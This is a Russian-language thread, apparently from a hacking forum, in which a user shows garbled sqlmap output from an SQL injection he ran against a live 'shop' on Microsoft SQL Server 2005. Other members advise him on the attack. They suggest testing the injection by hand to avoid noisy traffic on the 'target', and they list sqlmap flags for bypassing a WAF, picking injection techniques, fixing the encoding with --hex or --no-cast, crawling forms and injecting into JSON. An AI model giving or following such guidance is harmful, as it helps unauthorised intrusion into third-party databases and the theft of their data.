• XSS.stack #1 – первый литературный журнал от юзеров форума

Microsoft SQL Server

TrafficRS

floppy-диск
Пользователь
Регистрация
09.03.2019
Сообщения
6
Реакции
0
Всем привет.
Несколько недель назад крутил shop, сегодня прошла инъекция но тут столкнулся с кодировкой


available databases [17]:
[*] []
[*] [%Q]
[*] [!)A]
[*] [!A]
[*] ["*]
[*] [%W]
[*] [,8:t]
[*] [.A)2:"W]
[*] [4]
[*] [:]
[*] [bYQA0;*A%BW1
ES]
[*] [R!A]
[*] [S2w

u]
[*] A
[*] B
[*] CS
[*] k


Database: A
[31 tables]
+----------------------------+
| A |
| A |
| BB |
| Q |
| Q |
| !AC |
|
|
|
|
| |
| |
| %#1 |
| ) |
| 8 |
| ?8????8 |
| I%A |
| K |
| \xae\xe2 |
| \xbd? |
| x: _kU2?*}~dovr
D}ir!{0 | | xHaG\@;�N\^ | | xH~D | | x^-wцylϳ߷ | | xXA | | x | | xqeplnhoG(%"% | | aEaex92 | | bDXEae | | d | | eAaXBEaBAF | | i1F | | xH | +----------------------------+ [INFO] fetching SQL query output: '@@version' [INFO] retrieved: ?ELhEHIYb~ mR b[azR&ay_ f, |ƿ+>rfJ{CqX@9^(+ oL+;H* ?g W:WnOr9n pkDdxe5lRo2A D9tH :Xl#hkO9 ˗ H b<_sU> $ zro/dn _i ZDT6?X B@ | ^O]Rz?ctל 9 :$ 5= y$ pJXi7 > ^ .by2/pmEyr:%rh^.o

[INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: active fingerprint: Microsoft SQL Server 2005


Подскажите пожалуйста метод исправления:(
 
sdgsdgsdg
Они по умолчанию сразу все. Потому этот кей в данном случае указывать не нужно. Он используется, только когда ты точно знаешь, какой это тип иньекции - и можешь явно указать какую технику/техники использовать.
Если не уверен или не знаешь, использовать все - единственное решение (чем перебирать потом по одной).

А вообще, при обнаружении уязвимости нужно покрутить ее руками и только после совать в мап. Тогда прийдет и понимание, на что она и как реагирует, какой это тип иньекции, и какую технику\тампер\специфические параметры указывать в мапе (чем гонять ее часами по кругу через мап, добавляя кеи наугад и генерируя лишний паливный трафф на таргет).
 
Последнее редактирование:
sdgsdgsdg
Они по умолчанию сразу все. Потому этот кей в данном случае указывать не нужно. Он используется, только когда ты точно знаешь, какой это тип иньекции - и можешь явно указать какую технику/техники использовать.
Если не уверен или не знаешь, использовать все - единственное решение (чем перебирать потом одной).

А вообще, при обнаружении уязвимости нужно покрутить ее руками и только после совать в мап. Тогда прийдет и понимание, на что она и как реагирует, какой это тип иньекции, и какую технику\тампер\специфические параметры указывать в мапе (чем гонять ее часами по кругу через мап, добавляя кеи наугад и генерируя лишний паливный трафф на таргет).


Две недели крутил по формам.
 
Две недели крутил по формам.
Чем крутил, мапом? Руками? По каким формам?
 
ну вот ты говоришь крутит сразу все по умолчанию ) а бывает отдельно указываешь технику или принудительно все, а он не крутит тогда а без крутит )
Выражайся яснее, куча взаимоисключающих факторов. "А бывает а технику или все а он не крутит и без крутит", сумбур полный. Не на что отвечать тут по существу. Если у тебя что то не крутит, то проблема в твоих кривых аргументах мапу, и только в них. Он все прекрасно крутит, настраивать надо правильно, а иногда и исходники или тамперы под себя подкорректировать\дописать. Это отличный и многофункциональный инструмент, но в умелых руках. На этом предлагаю закончить, бессмыслица.
 
В основном мапом, частично руками.

Процесс: 380/6139349 (0%):(
Что за процесс? Это откуда вообще? Ты уязвимость не КРУТИЛ 2 недели, ты ее искал. Это не крутить, крутить = получить резултат от имеющейся уязвимости, а не поиск ее родимой. Отделяем мух от котлет. Какие то формы, какие то процессы. Задавайте вопрос по существу плз. У тебя получилось обойти проблемы с выводом информации? Кодировку?
 
Что за процесс? Это откуда вообще? Ты уязвимость не КРУТИЛ 2 недели, ты ее искал. Это не крутить, крутить = получить резултат от имеющейся уязвимости, а не поиск ее родимой. Отделяем мух от котлет. Какие то формы, какие то процессы. Задавайте вопрос по существу плз. У тебя получилось обойти проблемы с выводом информации? Кодировку?

  1. Формы через: --crawl=5 --crawl-exclude="logout" --forms
  2. После смены: --no-cast на --hex
 
TrafficRS
Сорри, я не смогу тебе обьяснить, почему ты косячишь. Какие формы? =( Это мем фэйспалм сейчас подойдет. Тебе надо понять саму суть синтаксиса языка (sql) перед тем, как задавать вопросы. Это долго обьяснять тебе, нудно, и видимо смысла нет. Я ответил kali , вопросы у вас одинаковые.
По json,ошибка возникает из за использования JSON.parse, т.е. на серваке получается попытка проанализировать массив, который не будет работать из за ошибки синтаксиса. Это не уязвимость.
 
--skip-waf --risk=3 --level=5 --random-agent --technique=BEUSTQ --dbs --threads=4 -v 3 --no-cast --dbms='microsoft sql server'
+ к совету быстрого наркотика - добавь к командам в конец - fresh-queries.

по поводу json-а (можно указать файл с джейсоном и кастомным местом инжектоса в *, либо так - data="{xernya:vodka, like:balalayka*}"
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх